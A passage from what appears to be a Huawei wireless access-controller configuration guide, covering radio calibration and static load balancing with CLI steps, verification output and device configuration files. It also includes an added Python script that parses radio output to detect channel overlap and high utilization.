Warning: Modifying the country code will clear channel, power and antenna gain
configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Import the AP offline on the AC and add the AP to AP group ap-group1. Assume that the
AP's MAC address is 60de-4476-e360. Configure a name for the AP based on the AP's
deployment location, so that you can know where the AP is deployed from its name. For
example, name the AP area_1 if it is deployed in Area 1.
NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 (2.4 GHz radio) and radio 1 (5 GHz
radio).
[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name area_1
[AC-wlan-ap-0] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will
clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-0] quit
[AC-wlan-view] ap-id 1 ap-mac dcd2-fc04-b500
[AC-wlan-ap-1] ap-name area_2
[AC-wlan-ap-1] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will
clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-1] quit

# After the AP is powered on, run the display ap all command to check the AP state. If the
State field is displayed as nor, the AP goes online normally.
[AC-wlan-view] display ap all
Total AP information:
nor : normal [2]
---------------------------------------------------------------------------------------
ID MAC Name Group IP Type State STA Uptime
---------------------------------------------------------------------------------------
0 60de-4476-e360 area_1 ap-group1 10.23.101.253 AP6010DN-AGN nor 0 5M:2S
1 dcd2-fc04-b500 area_2 ap-group1 10.23.101.254 AP6010DN-AGN nor 0 5M:4S
---------------------------------------------------------------------------------------
Total: 2

Step 4 Configure WLAN service parameters.


# Create security profile wlan-security and set the security policy in the profile.
NOTE

In this example, the security policy is set to WPA2+PSK+AES and password to a1234567. In actual
situations, the security policy must be configured according to service requirements.
[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] security wpa2 psk pass-phrase a1234567 aes //Configure security policy WPA2+PSK+AES.
[AC-wlan-sec-prof-wlan-security] quit

# Create SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net //Set the SSID to wlan-net.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit

# Create VAP profile wlan-vap, set the data forwarding mode and service VLAN, and apply
the security profile and SSID profile to the VAP profile.
[AC-wlan-view] vap-profile name wlan-vap
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel //Set the service forwarding mode to tunnel.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101 //Set the VLAN ID to 101. By default, the VLAN ID is 1.
[AC-wlan-vap-prof-wlan-vap] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap] quit

# Bind VAP profile wlan-vap to the AP group and apply the profile to radio 0 and radio 1 of
the AP.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] quit

Step 5 Configure radio calibration.


# Create the RRM profile wlan-net and enable automatic channel selection and automatic
transmit power selection in the RRM profile. By default, automatic channel selection and
automatic transmit power selection are enabled.
[AC-wlan-view] rrm-profile name wlan-net
[AC-wlan-rrm-prof-wlan-net] undo calibrate auto-channel-select disable
[AC-wlan-rrm-prof-wlan-net] undo calibrate auto-txpower-select disable
[AC-wlan-rrm-prof-wlan-net] quit

# Create the air scan profile wlan-airscan and configure the scan channel set, scan interval,
and scan duration. By default, an air scan channel set contains all channels supported by the
corresponding country code of an AP.
[AC-wlan-view] air-scan-profile name wlan-airscan
[AC-wlan-air-scan-prof-wlan-airscan] scan-channel-set country-channel
[AC-wlan-air-scan-prof-wlan-airscan] scan-period 80
[AC-wlan-air-scan-prof-wlan-airscan] scan-interval 80000
[AC-wlan-air-scan-prof-wlan-airscan] quit

# Create the 2G radio profile radio2g and bind the RRM profile wlan-net and air scan profile
wlan-airscan to the 2G radio profile.
[AC-wlan-view] radio-2g-profile name radio2g
[AC-wlan-radio-2g-prof-radio2g] rrm-profile wlan-net
[AC-wlan-radio-2g-prof-radio2g] air-scan-profile wlan-airscan
[AC-wlan-radio-2g-prof-radio2g] quit

# Create the 5G radio profile radio5g and bind the RRM profile wlan-net and air scan profile
wlan-airscan to the 5G radio profile.
[AC-wlan-view] radio-5g-profile name radio5g
[AC-wlan-radio-5g-prof-radio5g] rrm-profile wlan-net
[AC-wlan-radio-5g-prof-radio5g] air-scan-profile wlan-airscan
[AC-wlan-radio-5g-prof-radio5g] quit

# Bind the 5G radio profile radio5g and 2G radio profile radio2g to the AP group ap-
group1.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] radio-5g-profile radio5g
[AC-wlan-ap-group-ap-group1] radio-2g-profile radio2g
[AC-wlan-ap-group-ap-group1] quit

# Set the radio calibration mode to manual and trigger radio calibration. By default, the radio
calibration mode is manual.
[AC-wlan-view] calibrate enable manual
[AC-wlan-view] calibrate manual startup

Step 6 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 7 Verify the configuration.


• Connect STAs to the WLAN with SSID wlan-net and enter the password a1234567.
Run the display station ssid wlan-net command on the AC. The command output
shows that the STAs are connected to the WLAN wlan-net.
[AC-wlan-view] display station ssid wlan-net
Rf/WLAN: Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
----------------------------------------------------------------------------------------
STA MAC AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN IP address
----------------------------------------------------------------------------------------
e019-1dc7-1e08 0 area_1 0/1 2.4G 11n 65/38 -29 101 10.23.101.253
b878-2eb4-2689 1 area_2 0/1 2.4G 11n 78/43 -33 101 10.23.101.254
----------------------------------------------------------------------------------------
Total: 2 2.4G: 2 5G: 0

• Run the display radio all command on the AC to check radio calibration results.
[AC-wlan-view] display radio all
CH/BW:Channel/Bandwidth
CE:Current EIRP (dBm)
ME:Max EIRP (dBm)
CU:Channel utilization
ST:Status


----------------------------------------------------------------------
AP ID Name RfID Band Type ST CH/BW CE/ME STA CU
----------------------------------------------------------------------
1 area_2 0 2.4G bgn on 1/20M 28/28 1 10%
1 area_2 1 5G an on 149/20M 29/29 0 15%
0 area_1 0 2.4G bgn on 6/20M 28/28 1 15%
0 area_1 1 5G an on 153/20M 29/29 0 49%
----------------------------------------------------------------------
Total:4

• Radio calibration stops one hour after it is manually triggered. After that, you can
perform either of the following configurations (these steps are not included in the
configuration files):
– (Recommended) Set the radio calibration mode to scheduled. Configure the APs to
perform radio calibration in off-peak hours, for example, between 00:00 am and
06:00 am.
[AC-wlan-view] calibrate enable schedule time 03:00:00
[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

– Manually fix the working channels of APs: disable automatic channel selection and
automatic transmit power selection in the RRM profile. Manually trigger radio
calibration when new APs are added to the network.
[AC-wlan-view] rrm-profile name wlan-net
[AC-wlan-rrm-prof-wlan-net] calibrate auto-channel-select disable
[AC-wlan-rrm-prof-wlan-net] calibrate auto-txpower-select disable
[AC-wlan-rrm-prof-wlan-net] quit
[AC-wlan-view] calibrate enable manual
[AC-wlan-view] calibrate manual startup
[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y
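The following Python script is an added example; it is not part of Huawei's documentation or of the AC software. It parses display radio all output in the layout shown in the verification step above and evaluates the calibration result against the interference case described in the Radio Calibration Overview: it lists same-band radios whose channels overlap (what automatic channel selection is meant to eliminate) and flags radios whose channel utilization stays high after calibration, which points to interference from sources the AC does not manage. The sample output is a constructed copy of the output above; the channel-center formulas are the standard IEEE 802.11 2.4 GHz and 5 GHz channel mappings, the occupied span is approximated as the printed bandwidth centred on the primary channel (exact for 20 MHz channels, an approximation for bonded channels), and the function names and the 40% utilization threshold are this example's own choices.

```python
import re
from itertools import combinations

# Constructed copy of the "display radio all" output shown above (not captured from a live AC).
SAMPLE_RADIO_OUTPUT = """\
CH/BW:Channel/Bandwidth
CE:Current EIRP (dBm)
ME:Max EIRP (dBm)
CU:Channel utilization
ST:Status
----------------------------------------------------------------------
AP ID Name RfID Band Type ST CH/BW CE/ME STA CU
----------------------------------------------------------------------
1 area_2 0 2.4G bgn on 1/20M 28/28 1 10%
1 area_2 1 5G an on 149/20M 29/29 0 15%
0 area_1 0 2.4G bgn on 6/20M 28/28 1 15%
0 area_1 1 5G an on 153/20M 29/29 0 49%
----------------------------------------------------------------------
Total:4
"""

# One data row of the table: AP ID, AP name, radio ID, band, type, status, CH/BW, CE/ME, STA, CU.
RADIO_ROW = re.compile(
    r"^\s*(?P<ap_id>\d+)\s+(?P<name>\S+)\s+(?P<rf_id>\d+)\s+(?P<band>2\.4G|5G)\s+"
    r"(?P<type>\S+)\s+(?P<st>on|off)\s+(?P<ch>\d+)/(?P<bw>\d+)M\s+"
    r"(?P<ce>\d+)/(?P<me>\d+)\s+(?P<sta>\d+)\s+(?P<cu>\d+)%\s*$")


def parse_display_radio(text):
    """Return one dict per radio row; header, legend and separator lines are skipped."""
    radios = []
    for line in text.splitlines():
        m = RADIO_ROW.match(line)
        if m:
            d = m.groupdict()
            radios.append({"ap": d["name"], "rf": int(d["rf_id"]), "band": d["band"],
                           "ch": int(d["ch"]), "bw": int(d["bw"]),
                           "ce": int(d["ce"]), "me": int(d["me"]), "cu": int(d["cu"])})
    return radios


def channel_center_mhz(band, channel):
    """Center frequency of a primary channel (IEEE 802.11 2.4 GHz and 5 GHz numbering)."""
    if band == "2.4G":
        return 2484 if channel == 14 else 2407 + 5 * channel
    return 5000 + 5 * channel


def overlapping_pairs(radios):
    """Pairs of same-band radios whose occupied spans overlap.

    Assumption: the span is the printed bandwidth centred on the primary channel, which is
    exact for 20 MHz channels and only approximate for bonded 40/80 MHz channels.
    """
    pairs = []
    for a, b in combinations(radios, 2):
        if a["band"] != b["band"]:
            continue
        separation = abs(channel_center_mhz(a["band"], a["ch"])
                         - channel_center_mhz(b["band"], b["ch"]))
        if separation < (a["bw"] + b["bw"]) / 2:
            pairs.append((a["ap"], a["ch"], b["ap"], b["ch"]))
    return pairs


def busy_radios(radios, threshold_pct=40):
    """Radios whose channel utilization exceeds the threshold (40% is an assumed default)."""
    return [(r["ap"], r["rf"], r["cu"]) for r in radios if r["cu"] > threshold_pct]


if __name__ == "__main__":
    radios = parse_display_radio(SAMPLE_RADIO_OUTPUT)
    for ap_a, ch_a, ap_b, ch_b in overlapping_pairs(radios):
        print(f"overlap: {ap_a} channel {ch_a} and {ap_b} channel {ch_b}")
    for ap, rf, cu in busy_radios(radios):
        print(f"high utilization: {ap} radio {rf} at {cu}%")
```

On the sample output the 2.4 GHz radios sit on channels 1 and 6 and the 5 GHz radios on 149 and 153, so no pair overlaps; the 5 GHz radio of area_1 is still reported because its 49% utilization with no connected STA suggests a neighbouring network or non-Wi-Fi source on that channel, which a scheduled calibration run rather than a one-off manual run would keep reacting to.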

----End

Configuration Files
• Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface gigabitethernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface gigabitethernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface gigabitethernet0/0/3
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
return

• Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 101
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 101
#
capwap source interface vlanif100
#
wlan
calibrate enable schedule time 03:00:00
security-profile name wlan-security
security wpa2 psk pass-phrase %^%#m"tz0f>~7.[`^6RWdzwCy16hJj/Mc!,}s`X*B]}A%^%# aes
ssid-profile name wlan-ssid
ssid wlan-net
vap-profile name wlan-vap
forward-mode tunnel
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
regulatory-domain-profile name domain1
air-scan-profile name wlan-airscan
scan-period 80
scan-interval 80000
rrm-profile name wlan-net
radio-2g-profile name radio2g
rrm-profile wlan-net
air-scan-profile wlan-airscan
radio-5g-profile name radio5g
rrm-profile wlan-net
air-scan-profile wlan-airscan
ap-group name ap-group1
regulatory-domain-profile domain1
radio 0
radio-2g-profile radio2g
radio-5g-profile radio5g
vap-profile wlan-vap wlan 1
radio 1
radio-5g-profile radio5g
vap-profile wlan-vap wlan 1
ap-id 0 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235554710CB000042
ap-name area_1
ap-group ap-group1
ap-id 1 type-id 21 ap-mac dcd2-fc04-b500 ap-sn 210235554710CB000078
ap-name area_2
ap-group ap-group1
#
return


16.9.2 Example for Configuring Static Load Balancing

Session-based Static Load Balancing Overview


Load balancing can evenly distribute AP traffic loads to ensure sufficient bandwidth for each
STA. In static load balancing, APs are manually added to a load balancing group. When a
STA wants to connect to an AP in the load balancing group, the AC determines whether to
allow the STA to connect to the AP according to a load balancing algorithm.

Static load balancing can be used in scenarios such as conference rooms. For example, if two
APs are deployed in a conference room, you can add the two APs to a load balancing group to
prevent heavy load on a single AP.

Configuration Notes
l In this example, the security policy is WPA2-PSK-AES. To ensure network security,
choose an appropriate security policy according to your network configurations.
l In the service data forwarding mode, the management VLAN and service VLAN cannot
be the same. If you set the forwarding mode to direct forwarding, you are not advised to
configure the management VLAN and service VLAN to be the same.
l If direct forwarding is used, configure port isolation on the interface directly connects to
APs. If port isolation is not configured, many broadcast packets will be transmitted in the
VLANs or WLAN users on different APs can directly communicate at Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l Each load balancing group supports a maximum of three APs.
l A load balancing group is a set of radios. A radio can join only one load balancing
group. If dual-band APs are used, traffic is load balanced among APs working on the
same frequency band. That is, a dual-band AP can join two load balancing groups.
l All APs in a load balancing group work on the same frequency band (2.4 GHz or 5
GHz). AP radios in a load balancing group must have different channels configured and
work on different channels.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 16-21 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN,
AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D,
AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN,
AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12,
R230D, R240D
V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN,
AP4030DN, AP4130DN, AP3030DN, AP2030DN

Networking Requirements
As shown in Figure 16-9, the AC connects to the upper-layer network and manages the APs
through the access and aggregation switches.
AP area_1 and AP area_2 are deployed in the same conference room. The customer requires
that data traffic be balanced on AP radios to prevent one AP radio from being heavily loaded.

Figure 16-9 Networking diagram for configuring static load balancing

[Figure: Internet - Router (GE2/0/0, VLAN 102) - AC (GE1/0/2 in VLAN 102 towards the Router,
GE1/0/1 in VLAN 100 towards SwitchA) - SwitchA (GE0/0/2 in VLAN 100 towards the AC; GE0/0/1 and
GE0/0/3 in VLAN 100 towards the APs) - AP area_1 and AP area_2, each serving STAs.
Management VLAN: VLAN 100; service VLAN: VLAN 101.]

Configuration Roadmap

Table 16-22 Data required for completing the configuration

DHCP server: The AC functions as the DHCP server to assign IP addresses to the APs and STAs.
IP address pool for the APs: 10.23.100.2-10.23.100.254/24
IP address pool for the STAs: 10.23.101.2-10.23.101.254/24
IP address of the AC's source interface: VLANIF 100: 10.23.100.1/24
AP group:
l Name: ap-group1
l Referenced profiles: VAP profile wlan-vap and regulatory domain profile domain1
Regulatory domain profile:
l Name: domain1
l Country code: CN
SSID profile:
l Name: wlan-ssid
l SSID name: wlan-net
Security profile:
l Name: wlan-security
l Security policy: WPA2+PSK+AES
l Password: a1234567
VAP profile:
l Name: wlan-vap
l Forwarding mode: tunnel forwarding
l Service VLAN: VLANs in the VLAN pool
l Referenced profiles: SSID profile wlan-ssid and security profile wlan-security
Static load balancing group:
l Name: wlan-static
l Start threshold for load balancing: 15
l Load difference threshold for load balancing: 25%

The configuration roadmap is as follows:


1. Configure the APs, AC, and upper-layer devices to communicate with each other.
2. Configure the AC as a DHCP server to assign IP addresses to the APs and STAs.
3. Configure a VLAN pool for service VLANs.
4. Configure the APs to go online.
a. Create an AP group and add APs that require the same configuration to the group
for unified configuration.
b. Configure AC system parameters, including the country code and source interface
used by the AC to communicate with the APs.
c. Configure the AP authentication mode and import the APs offline to allow the APs
to go online.
5. Configure WLAN service parameters for STAs to access the WLAN.
6. Configure static load balancing to prevent one AP from being heavily loaded.

NOTE
During AP deployment, you can manually specify the working channels of the APs according to network
planning or configure the radio calibration function to enable the APs to automatically select the optimal
channels. This example configures the radio calibration function.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.
# Add GE0/0/1 to GE0/0/3 on SwitchA to VLAN 100 (management VLAN).
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3
[SwitchA-GigabitEthernet0/0/3] port link-type trunk
[SwitchA-GigabitEthernet0/0/3] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/3] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/3] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.


# Configure VLAN 101 (service VLAN) and VLANIF 102.
[AC] vlan batch 101 102
[AC] interface vlanif 101
[AC-Vlanif101] ip address 10.23.101.1 24
[AC-Vlanif101] quit
[AC] interface vlanif 102
[AC-Vlanif102] ip address 10.23.102.2 24
[AC-Vlanif102] quit

# Configure a default route on the AC.


[AC] ip route-static 0.0.0.0 0.0.0.0 10.23.102.1 //Configure a default route
destined for Router.

# Add GE1/0/2 that connects the AC to the Router to VLAN 102.


[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 102
[AC-GigabitEthernet1/0/2] quit

Step 3 Configure the AC to assign an IP address to the AP and the Router to assign IP addresses to
STAs.

# Configure the AC to assign an IP address to the AP from an interface IP address pool.


[AC] dhcp enable
[AC] interface vlanif 100
[AC-Vlanif100] ip address 10.23.100.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit

# Configure the AC as the DHCP relay agent and enable user entry detection on the AC.
[AC] interface vlanif 101
[AC-Vlanif101] dhcp select relay //Configure the DHCP relay function.
[AC-Vlanif101] dhcp relay server-ip 10.23.102.1 //Set the DHCP server address
for DHCP relay to 10.23.102.1, which resides on Router.
[AC-Vlanif101] quit

# Configure the Router as a DHCP server to allocate IP addresses to STAs.


<Huawei> system-view
[Huawei] sysname Router
[Router] dhcp enable
[Router] ip pool sta //Configure the address pool to assign IP addresses to STAs.
[Router-ip-pool-sta] gateway-list 10.23.101.1
[Router-ip-pool-sta] network 10.23.101.0 mask 24
[Router-ip-pool-sta] quit
[Router] vlan batch 102
[Router] interface vlanif 102
[Router-Vlanif102] ip address 10.23.102.1 24
[Router-Vlanif102] dhcp select global //Configure a global address pool.
[Router-Vlanif102] quit
[Router] interface gigabitethernet 2/0/0
[Router-GigabitEthernet2/0/0] port link-type trunk
[Router-GigabitEthernet2/0/0] port trunk allow-pass vlan 102
[Router-GigabitEthernet2/0/0] quit
[Router] ip route-static 10.23.101.0 24 10.23.102.2 //Configure a route on the
Router destined for the network segment 10.23.101.0/24.

Step 4 Configure the AP to go online.

# Create an AP group and add the AP to the AP group.


[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain
configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Import the AP offline on the AC and add the AP to AP group ap-group1. Assume that the
AP's MAC address is 60de-4476-e360. Configure a name for the AP based on the AP's
deployment location, so that you can know where the AP is deployed from its name. For
example, name the AP area_1 if it is deployed in Area 1.

NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 (2.4 GHz radio) and radio 1 (5 GHz
radio).
[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name area_1
[AC-wlan-ap-0] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will
clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-0] quit
[AC-wlan-view] ap-id 1 ap-mac dcd2-fc04-b500
[AC-wlan-ap-1] ap-name area_2
[AC-wlan-ap-1] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will
clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-1] quit

# After the AP is powered on, run the display ap all command to check the AP state. If the
State field is displayed as nor, the AP goes online normally.
[AC-wlan-view] display ap all
Total AP information:
nor : normal [2]
---------------------------------------------------------------------------------------
ID  MAC             Name    Group      IP             Type          State  STA  Uptime
---------------------------------------------------------------------------------------
0   60de-4476-e360  area_1  ap-group1  10.23.101.253  AP6010DN-AGN  nor    0    5M:2S
1   dcd2-fc04-b500  area_2  ap-group1  10.23.101.254  AP6010DN-AGN  nor    0    5M:4S
---------------------------------------------------------------------------------------
Total: 2

Step 5 Configure WLAN service parameters.


# Create security profile wlan-security and set the security policy in the profile.
NOTE

In this example, the security policy is set to WPA2+PSK+AES and password to a1234567. In actual
situations, the security policy must be configured according to service requirements.
[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] security wpa2 psk pass-phrase a1234567 aes //
Configure security policy WPA2+PSK+AES.
[AC-wlan-sec-prof-wlan-security] quit

# Create SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net //Set the SSID to wlan-net.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit

# Create VAP profile wlan-vap, set the data forwarding mode and service VLAN, and apply
the security profile and SSID profile to the VAP profile.
[AC-wlan-view] vap-profile name wlan-vap
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel //Set the service forwarding mode to tunnel.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101 //Set the VLAN ID to 101.
By default, the VLAN ID is 1.
[AC-wlan-vap-prof-wlan-vap] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap] quit

# Bind VAP profile wlan-vap to the AP group and apply the profile to radio 0 and radio 1 of
the AP.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] quit

Step 6 Configure static load balancing.


# Create the static load balancing group and set the start threshold for static load balancing to
15 and load difference threshold to 25%.
[AC-wlan-view] sta-load-balance static-group name wlan-static //Create load
balancing group wlan-static.
[AC-wlan-sta-lb-static-wlan-static] start-threshold 15 //Set the maximum number
of association requests in a static load balancing group to 15. The default value
is 10.
[AC-wlan-sta-lb-static-wlan-static] gap-threshold 25 //Configure session-based
static load balancing and set the load difference threshold to 25%. The default
value is 20%.

# Add AP area_1 and AP area_2 to the static load balancing group.


[AC-wlan-sta-lb-static-wlan-static] member ap-name area_1 //Add AP area_1 to
load balancing group wlan-static.
[AC-wlan-sta-lb-static-wlan-static] member ap-name area_2
[AC-wlan-sta-lb-static-wlan-static] quit

Step 7 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 8 Verify the configuration.


l Connect STAs to the WLAN with SSID wlan-net and enter the password a1234567.
Run the display station ssid wlan-net command on the AC. The command output
shows that the STAs are connected to the WLAN wlan-net.
[AC-wlan-view] display station ssid wlan-net
Rf/WLAN: Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
-------------------------------------------------------------------------------------
STA MAC         AP ID  Ap name  Rf/WLAN  Band  Type  Rx/Tx  RSSI  VLAN  IP address
-------------------------------------------------------------------------------------
e019-1dc7-1e08  0      area_1   0/1      2.4G  11n   65/38  -29   101   10.23.101.253
b878-2eb4-2689  1      area_2   0/1      2.4G  11n   78/43  -33   101   10.23.101.254
-------------------------------------------------------------------------------------
Total: 2 2.4G: 2 5G: 0

l Run the display sta-load-balance static-group name wlan-static command on the AC
to check the static load balancing configuration.
[AC-wlan-view] display sta-load-balance static-group name wlan-static
------------------------------------------------------------
Group name : wlan-static
Load-balance status : balance
Start threshold : 15
Gap threshold(%) : 25
Deny threshold : 3
------------------------------------------------------------
RfID: Radio ID
CurEIRP: Current EIRP (dBm)
Act CH: Actual channel, Cfg CH: Config channel
------------------------------------------------------------
AP ID AP Name RfID Act CH/Cfg CH CurEIRP/MaxEIRP Client
------------------------------------------------------------
0 area_1 0 6/- 20/28 1
0 area_1 1 153/- 29/29 0
1 area_2 0 1/- 20/28 1
1 area_2 1 149/- 29/29 0
